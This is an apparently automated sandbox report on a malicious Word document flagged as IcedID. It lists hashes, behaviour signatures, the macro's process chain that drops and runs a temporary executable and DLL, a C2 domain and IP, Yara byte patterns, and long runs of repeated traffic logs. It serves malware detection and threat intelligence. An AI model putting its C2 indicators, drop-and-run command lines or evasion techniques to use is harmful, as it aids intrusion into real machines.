
Windows Analysis Report
dodsonimaging,file,08.11.2022.doc

Overview

General Information

Sample Name: dodsonimaging,file,08.11.2022.doc
Analysis ID: 682555
MD5: db11828aed458eccfab30c367bc1bb2f
SHA1: 3487931f130485c82d21e9ef4155af0a8fd46c33
SHA256: d297f78ca4fc35e899792260c98f752947f7d6b5999650a6210f4a8538a2e655
Tags: doc, IcedID

Detection

IcedID
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for dropped file
Yara detected IcedID
Submitted sample is a known malware sample
Office process drops PE file
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Yara signature match
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 1232 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • r8F8A.tmp.exe (PID: 1364 cmdline: "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
      • rundll32.exe (PID: 1552 cmdline: "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1 MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup
{"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_IcedID_0b62e783; Description: unknown; Author: unknown
  • 0x876:$a: 89 44 95 E0 83 E0 07 8A C8 42 8B 44 85 E0 D3 C8 FF C0 42 89 44
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_IcedID_91562d18; Description: unknown; Author: unknown
  • 0x1bc4:$a: 44 8B 4C 19 2C 4C 03 D6 74 1C 4D 85 C0 74 17 4D 85 C9 74 12 41
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_IcedID_48029e37; Description: unknown; Author: unknown
  • 0x1190:$a: 48 C1 E3 10 0F 31 48 C1 E2 20 48 0B C2 0F B7 C8 48 0B D9 8B CB 83 E1
Source: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp; Rule: Windows_Trojan_IcedID_11d24d35; Description: unknown; Author: unknown
  • 0x3d0:$a2: loader_dll_64.dll
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp; Rule: JoeSecurity_IcedID_6; Description: Yara detected IcedID; Author: Joe Security
Source: 5.2.rundll32.exe.180000000.1.unpack; Rule: MAL_IcedID_GZIP_LDR_202104; Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads; Author: Thomas Barabosch, Telekom Security
  • 0x27d0:$internal_name: loader_dll_64.dll
  • 0x3198:$string0: _gat=
  • 0x3048:$string1: _ga=
  • 0x30a0:$string2: _gid=
  • 0x3118:$string3: _u=
  • 0x303a:$string4: _io=
  • 0x3054:$string5: GetAdaptersInfo
  • 0x2b08:$string6: WINHTTP.dll
  • 0x27f4:$string7: DllRegisterServer
  • 0x2806:$string8: PluginInit
  • 0x3134:$string9: POST
Source: 5.2.rundll32.exe.180000000.1.unpack; Rule: JoeSecurity_IcedID_6; Description: Yara detected IcedID; Author: Joe Security
Source: 5.2.rundll32.exe.180000000.1.unpack; Rule: MALWARE_Win_IceID; Description: Detects IceID / Bokbot variants; Author: ditekSHen
  • 0x3134:$n1: POST
  • 0x3194:$n2: ; _gat=
  • 0x3044:$n3: ; _ga=
  • 0x3114:$n4: ; _u=
  • 0x3034:$n5: ; __io=
  • 0x309c:$n6: ; _gid=
  • 0x316c:$n7: Cookie: __gads=
  • 0x30f4:$s1: c:\ProgramData
  • 0x27d0:$s2: loader_dll_64.dll
Source: 5.2.rundll32.exe.180000000.1.unpack; Rule: Windows_Trojan_IcedID_11d24d35; Description: unknown; Author: unknown
  • 0x27d0:$a2: loader_dll_64.dll
Source: 5.2.rundll32.exe.180000000.1.unpack; Rule: Windows_Trojan_IcedID_0b62e783; Description: unknown; Author: unknown
  • 0xc76:$a: 89 44 95 E0 83 E0 07 8A C8 42 8B 44 85 E0 D3 C8 FF C0 42 89 44
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: dodsonimaging,file,08.11.2022.doc; Virustotal: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll; Avira: detection malicious, Label: HEUR/AGEN.1251556
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll; Avira: detection malicious, Label: HEUR/AGEN.1251556
Source: Yara match; File source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
Source: Yara match; File source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE
Source: dodsonimaging,file,08.11.2022.doc; Joe Sandbox ML: detected
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: IcedID {"Campaign ID": 3570055661, "C2 url": "alexbionka.com"}
Source: C:\Windows\System32\rundll32.exe; Code function: 5_2_000007FEF74D2CCA CryptCreateHash, 5_2_000007FEF74D2CCA
Source: C:\Windows\System32\rundll32.exe; Code function: 5_2_000007FEF74D2CDA CryptCreateHash, 5_2_000007FEF74D2CDA
Source: C:\Windows\System32\rundll32.exe; Code function: 5_2_000007FEF74D2CF7 CryptCreateHash, CryptAcquireContextW, 5_2_000007FEF74D2CF7
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: rundll32.pdb source: r8F8A.tmp.exe, r8F8A.tmp.exe, 00000004.00000000.924645726.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe, 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe.0.dr

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll.0.dr
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe
Source: global traffic; DNS query: name: alexbionka.com
Source: global traffic; TCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
Source: global traffic; TCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 45.8.146.139:80
      Source: global trafficTCP traffic: 45.8.146.139:80 -> 192.168.2.22:49171
